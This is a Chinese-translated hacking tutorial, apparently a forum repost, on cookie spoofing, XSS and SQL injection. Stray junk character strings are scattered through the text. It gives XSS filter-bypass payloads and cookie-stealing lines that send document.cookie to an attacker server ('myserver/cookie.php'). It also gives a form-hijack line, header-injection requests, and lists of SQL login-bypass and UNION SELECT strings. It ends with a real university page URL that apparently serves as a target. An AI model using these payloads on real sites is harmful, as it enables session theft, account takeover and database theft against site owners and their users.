XSS & SQL注入

admin

XSS & SQL注入
4 j; f7 r5 D: B5 S! Y2 l文章作者：CyberPhreak
# H- E1 T3 m" `9 o! C* ?译文作者：黯魂 [S.S.T]


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


~介绍

在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.
5 f6 s+ Q$ j* `( T
XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
5 f  h! k$ X* I; y: t7 D/ G, dXXXXXXXXXXXXXXXXXXXXX
+ Q8 ?* R! w0 \
XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
/ d) t7 Z: j  N8 gX XSS X
( K( t1 e# Z: g: D. oX SQL Injection X
XXXXXXXXXXXXXXXXXXXX

/ E. b2 s$ t2 \( ?~什么是cookie
7 x; o. o% M4 m4 s) b) O/ W2 F# g3 ~
- H2 W1 u, Q# z3 s0 Q" s1 Kcookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
. A2 }* N) w* T+ T2 _5 \! z- K
~警告&欺骗

那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
, S% \: ^' M6 `! o, h: D  v. A
' b  o" B2 _, A  m' |2 ~strusername=cnsst;strpassword=cnsst
# g: u: x# W+ E$ A* o1 g" ^
. u) T& r+ p; `此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
$ ^& N1 h" R% y- m" S" _% ]
~什么是XSS
: g- R- M4 s3 E1 F+ H6 ^. X/ E
XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

~为什么使用XSS

很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
" P+ q7 J& K% I你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.

~让我们开始吧…
- Z; ]4 ~. h9 I& D% ?
5 G+ K9 ^  ^! F9 k3 C我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
; ^- g1 a7 z8 L
XSS--跨站脚本&lt;html&gt;
' }' `" N7 t- M
% Y6 B+ g" C0 @; Z&lt;body&gt;

. n3 J& }6 }, U% l&lt;form action="" method="GET"&gt;

&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;
; r. M7 ?5 f' A! _4 I: q- [
  G& L, [* X' J, zScript: &lt;input name="name" type="name"&gt;

6 r$ |1 D; X- S; H7 c3 R&lt;input type="submit" value="submit"&gt;
$ K  y7 h( o1 [% Q7 D$ G
2 P1 o1 W' K+ T&lt;/form&gt;

, T* o* g: y1 N* \&lt;/body&gt;
' g* \0 m% Y  z1 U+ I: q4 ?
" Q& H3 {+ c$ `&lt;/html&gt;
* e0 {% k) F' @( B

" }& u' i- c3 y. B; ~" g. h
6 T" M  {. W0 [" V5 s9 o&lt;?php

+ h5 Q" }) x. q3 H2 y/ t6 [6 f$name = $_GET['name'];

echo("Hello $name");

" b" y, [0 O( h$ v' K?&gt;
6 ?) ]1 k( C, e0 x6 U8 Q1 Z复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

/ Q# a, c$ H0 ^3 a, ]/ Qcnsst
" A# ], R. ?1 J"Hello cnsst!"
3 N, F  U1 s8 t9 U! g' z7 y
/ O4 p- V; j' _+ H* R  i1 P引号内的信息就是输出信息..注意看,现在我输入:
& j& Q3 f- c) D1 n: y& d/ W<script>alert(document.cookie)</script>

6 ]6 w# H; k& Y* ]% }那么它将会弹出document.cookie!所以它是易受XSS攻击的!

% ~0 j- c$ J: ^; O0 e, t1 X- ~现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

; B8 t2 U0 u6 ~! e$ i: x服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
+ s$ X7 C: s' q
5 W& L8 ?+ S  s9 J2 Q3 {9 c! d已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
- R- ]# Y9 L. i5 R3 x9 I1 T) G
让我们看一个稍微复杂点的例子!

" d$ V  p* H2 ^% G) X5 Z* E" b8 y假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
! C: C7 T& g& q& s/ `/ X1 _scriptalert(document.cookie)/script
0 G* t) Y5 g* |$ |或者可能是这样的:
3 O7 N# b! `$ y4 [3 |% \; |# v* d3 bscriptalertdocument.cookie/script

6 P6 u% o% L6 s# U- T; ^, c- @可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.
' ?' d- a$ l7 y. u
让我们继续利用:
$ ?; c4 ]6 v4 `7 O<<script>>alert(document.cookie)<</script>>

2 D( F8 n1 y6 b8 b你的输出将弹出document.cookie.

现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>
2 A! N8 [" o& h- x; B) x
% Z6 Z( w8 S! e' e* b
他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
4 n" v9 Q, t( K2 F6 ^! Kscriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  
- V) s& D. M. E- w: g
他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
0 C( f9 i; S1 i& G4 ?8 n. U  X* ~  U  D
输出像这样:srplert(document.cookie)srp

5 k% Z9 J# A: X仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
/ X- W+ U% L% k8 {4 D<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>
* |/ c" o) d- Q% G7 M/ l8 y# ~
6 e% g" m1 ^& H8 c' i所有重复多余的部分刚好被替换!现在让我们来点更高级的!

$ Z- S1 q4 u5 P& N这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
<script>alert(document.cookie)</script>

输出将是:
scriptalert(document.cookie)script
) j" @1 }6 ?5 w# b& {
1 L: ?1 I8 }) }看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
<<script>>alert(document.cookie)<</script>>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
% J  l. W5 m" v
<
" S! ?& F6 x6 {6 Lscript
* ]. z5 ^5 B# U7 X  D- }7 Q5 e" P>
; Q% q: `8 b& _- u  Galert
(
+ {& {: E% ]! S0 H7 C! o" Z) s) {document
+ u1 i' ?0 J9 K& t& A9 C) v# n! k.
cookie
% G: ~( R. d3 b' A* O% p2 @) y)
<
. z4 I- v8 ^3 s/
- o% B- {2 ]: [7 _, w3 k( rscript
>


看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
5 M2 _6 e, ^* H2 ?* Ls
$ g0 S0 L, H8 T. Y* Y% h) ]c
r
i
p
t
- R! F0 v# f( V2 |& x6 h>
a
% i0 _% L0 X! {l
e
r
t
(
d
o
c
) V, G$ C4 g+ W* M0 Ku
m
+ f8 c4 @- f1 |1 be
: F. x/ W+ Q! Q5 e$ j- [& An
t
.
6 j; M" ~- B- s: Y$ h  Jc
o
o
( h9 e- t" l" s& \& X# ]7 U* Q% mk
i
# p" i- ^2 o& f0 pe
)
<
2 P9 K0 U0 K* t; U) U0 F/
s
c
r
) \1 J- z0 p% y! R0 b/ I8 Hi
p
t
/
>
. D4 H0 c% _" p+ ~* [, F4 M0 J
3 V( s# `6 F8 @7 F1 m8 Y这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
2 ?4 O, u# p5 C* H" ?" q: G% z
' P" h2 \5 H( Y4 b还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
1 O# y! j2 L$ \8 w# [
% I+ ?8 k& D+ Q# N现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
5 }2 p. }  T$ B7 i% \2 p
$ ~& ]  h- c; z3 \) [8 E3 z首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
7 p# n2 U: a. ]4 Z% P1 z, xdocument.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.

5 w, r; n0 b3 W. b6 h! R7 Q2 f; E再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
6 Q5 F& v- y  Z或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
. R/ g) ~2 |, u5 `/ Ljavascript:location.href="http://myserver/cookie.php"+document.cookie
+ f1 c, [" @6 E' m) |9 j这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.
; Z: H  |  }: j! u  n# M- j' ~
有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
8 P3 I7 }; ]: W% \GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
1 K* E4 n1 Z: M2 `. YUser-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
Referer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
' \4 D9 \$ b; G~什么是SQL注入

SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

' ?3 v% a2 ?) Z7 E- O; ~2 X% w+ s&lt;body&gt;
( U) e. ]4 M# v. R
&lt;form action="" method="POST"&gt;
! v' D" W2 Z7 X5 j2 U, G$ G
: @8 M& |4 g; ~6 TUsername: &lt;input name="name" type="name"&gt;
. k0 k* H* j. c- J3 B' I6 Y- |
Password: &lt;input name="password" type="password"&gt;
2 i- c; q" ?% s. n7 |2 u) y2 t0 t
" J: }! @0 ~8 y6 z3 V# {3 C&lt;input type="submit" type="submit" value="Submit"&gt;
9 E, c; L9 \! C  k" F  g. r
&lt;/form&gt;
9 z$ @6 }5 m0 [; C
! t( A# ~' M( H. t, i" s&lt;/body&gt;
2 R0 t  e, K+ R0 {2 `2 S
&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
1 `. ?2 u# r5 N
最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

* _: `6 X2 B/ e'='
9 X9 h2 u! f+ d' [9 u'OR 1=1--
'OR a=a--
. F1 ~- U, k) X  G'OR'

' M6 L/ K; k1 ]自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

'OR''='
& x3 n/ n3 j" u- G'OR"="
9 S: E- [( G% ^1 |- q7 `'OR'="
- l+ z% i- X8 Z' a. P. l# D'OR '="
: b5 a3 L8 c/ T% D; a0 N'OR "='
/ w# ?% ^5 Q9 X& z* S% @'OR ''='
* b, j0 i/ k* C/ ?" E2 \! c& t'OR '=''
1 D+ G5 D9 K7 a5 ?! T( A9 b% x: D'OR "=''
'OR ''="
3 a6 x9 f) l* @2 l

! s2 \& j: ^# d0 r~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
" L9 ]$ D( G3 HUNION ALL SELECT username,password FROM users

* v; T5 k( O% H" h$ X这个查询语句将执行,但是….如果毫无作用呢?
2 }4 ?6 K) L; K0 q, lUNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='
2 @' X0 A, [3 G& I
+ ^3 |, H' C. [1 T  t, F# Q你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
, t( ?3 m  y5 P0 ^UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="
/ m0 n+ Y1 A- |# M
现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
0 e1 s/ S7 t8 }. ?) _那将浏览Id为34的文章...让我们用"'"替换34:
2 {- D. K# R" P- x3 w% L2 Bhttp://example.com/index.php?article='
: t+ g% L! r& C

* X; `0 w0 R0 n# i; z1 T现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
3 ^. Q- ?! r6 Q  S' ]7 \3 \/ Ehttp://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
* Q1 L% V9 J: Z& k3 {1 }& c% {http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
: T! [: M. v1 k- l; P& w0 U/ x$ s. _) \. yhttp://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
http://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
( a# A# a9 ~3 V" k" Y3 L  dhttp://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704